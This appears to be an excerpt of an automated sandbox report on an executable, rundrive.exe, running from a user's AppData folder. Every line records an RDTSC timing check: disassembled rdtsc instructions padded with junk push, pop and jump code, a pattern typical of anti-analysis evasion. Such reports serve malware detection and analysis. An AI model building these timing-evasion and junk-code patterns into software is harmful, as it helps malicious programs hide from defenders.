Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 61AF38 second address: 61AF3C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 61B099 second address: 61B09D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 61B09D second address: 61B0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 61E538 second address: 61E543 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 61E543 second address: 61E547 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 61E547 second address: 61E54B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 61E54B second address: 61E566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FDA80C00880h 0x0000000b popad 0x0000000c push ecx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 625D7E second address: 625D90 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026BCh 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 623F55 second address: 623F5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 623F5B second address: 623F86 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FDA80C026B6h 0x00000008 jmp 00007FDA80C026C2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f jmp 00007FDA80C026BBh 0x00000014 push eax 0x00000015 push edx 0x00000016 push edx 0x00000017 pop edx 0x00000018 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 623F86 second address: 623F8A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 623F8A second address: 623F90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 623F90 second address: 623F9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 623F9C second address: 623FA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 623FA0 second address: 623FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 623FA4 second address: 623FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jns 00007FDA80C026C7h 0x0000000c push ebx 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 62475F second address: 62476E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 ja 00007FDA80C00876h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 624C43 second address: 624C47 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 624C47 second address: 624C83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C00884h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c ja 00007FDA80C00876h 0x00000012 jne 00007FDA80C00876h 0x00000018 jmp 00007FDA80C00884h 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 624C83 second address: 624C8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007FDA80C026B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 6257F9 second address: 6257FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 6257FF second address: 625805 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 625805 second address: 62580A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 62580A second address: 625849 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C2h 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push ecx 0x00000012 jmp 00007FDA80C026BCh 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FDA80C026C0h 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 625849 second address: 62584D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 629EFD second address: 629F02 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 62A049 second address: 62A055 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FDA80C00876h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 62A055 second address: 62A06F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDA80C026BEh 0x0000000d push edi 0x0000000e push esi 0x0000000f pop esi 0x00000010 pop edi 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 62A58C second address: 62A5C2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C0087Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jg 00007FDA80C00878h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 jmp 00007FDA80C00888h 0x00000019 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 62A5C2 second address: 62A5C7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 62A787 second address: 62A79C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 ja 00007FDA80C00876h 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jbe 00007FDA80C00876h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 62A942 second address: 62A94E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jo 00007FDA80C026B6h 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 62AA74 second address: 62AA7A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 639066 second address: 639089 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 jnc 00007FDA80C026B8h 0x00000016 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 639089 second address: 639091 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 639091 second address: 639095 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 637623 second address: 63764D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a jmp 00007FDA80C0087Bh 0x0000000f jmp 00007FDA80C00882h 0x00000014 pushad 0x00000015 popad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 637795 second address: 6377A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pushad 0x00000008 push edx 0x00000009 pop edx 0x0000000a js 00007FDA80C026B6h 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 6377A6 second address: 6377C7 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jmp 00007FDA80C00885h 0x00000008 pop ecx 0x00000009 jnc 00007FDA80C0087Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 6377C7 second address: 6377DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FDA80C026BAh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 6377DC second address: 6377E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 6377E0 second address: 6377EC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 6377EC second address: 6377F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 6377F0 second address: 637832 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C026C6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007FDA80C026C4h 0x00000013 jng 00007FDA80C026B6h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c je 00007FDA80C026B6h 0x00000022 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 637832 second address: 637838 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 637969 second address: 63796D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 63796D second address: 637977 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FDA80C00876h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 637ADE second address: 637B0E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnl 00007FDA80C026B6h 0x0000000d pushad 0x0000000e popad 0x0000000f je 00007FDA80C026B6h 0x00000015 jmp 00007FDA80C026C2h 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 637B0E second address: 637B12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 637B12 second address: 637B20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnp 00007FDA80C026B8h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 637B20 second address: 637B36 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FDA80C00880h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 6405C9 second address: 6405CD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 6405CD second address: 6405DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007FDA80C0087Eh 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 6401A0 second address: 6401AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FDA80C026B6h 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 6401AE second address: 6401B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 64DF1F second address: 64DF34 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007FDA80C026BCh 0x0000000c jne 00007FDA80C026B6h 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 653CDF second address: 653CE4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 657A56 second address: 657A6A instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jnl 00007FDA80C026B6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jne 00007FDA80C026B6h 0x00000014 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 657A6A second address: 657A6E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 657905 second address: 657920 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FDA80C026C3h 0x0000000d rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 65CEEE second address: 65CEF2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 660F5C second address: 660F63 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 667AE3 second address: 667AF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FDA80C0087Eh 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 667AF6 second address: 667B01 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 pop eax 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 671B01 second address: 671B07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 671B07 second address: 671B1B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c js 00007FDA80C026BEh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 671B1B second address: 671B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 671D8A second address: 671D92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 672A19 second address: 672A1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 672A1F second address: 672A29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 672A29 second address: 672A2D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 676604 second address: 67661C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FDA80C026C4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 67A5A0 second address: 67A5A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 67A5A4 second address: 67A5AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 67A5AA second address: 67A5B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 67A5B0 second address: 67A5B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 67A5B6 second address: 67A5C8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a ja 00007FDA80C00876h 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 6901E7 second address: 6901EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 6901EB second address: 6901EF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 69039D second address: 6903A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FDA80C026B6h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 6903A7 second address: 6903B3 instructions: 0x00000000 rdtsc 0x00000002 js 00007FDA80C00876h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 6903B3 second address: 6903BE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007FDA80C026B6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 697349 second address: 69734F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 69734F second address: 69735B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FDA80C026B6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 69735B second address: 69736E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a push esi 0x0000000b pop esi 0x0000000c ja 00007FDA80C00876h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 69736E second address: 69737A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007FDA80C026B6h 0x0000000a push eax 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 69737A second address: 69739F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FDA80C0087Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007FDA80C0088Ch 0x00000015 push eax 0x00000016 push edx 0x00000017 push edx 0x00000018 pop edx 0x00000019 push edx 0x0000001a pop edx 0x0000001b rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 69739F second address: 6973A9 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FDA80C026B6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 696421 second address: 69643B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FDA80C00885h 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 6966F2 second address: 6966F8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 6966F8 second address: 696704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 696704 second address: 69671D instructions: 0x00000000 rdtsc 0x00000002 ja 00007FDA80C026B6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jmp 00007FDA80C026BCh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 696B37 second address: 696B3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000550100\rundrive.exe	RDTSC instruction interceptor: First address: 696DE1 second address: 696DEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jg 00007FDA80C026B6h 0x0000000c popad 0x0000000d rdtsc
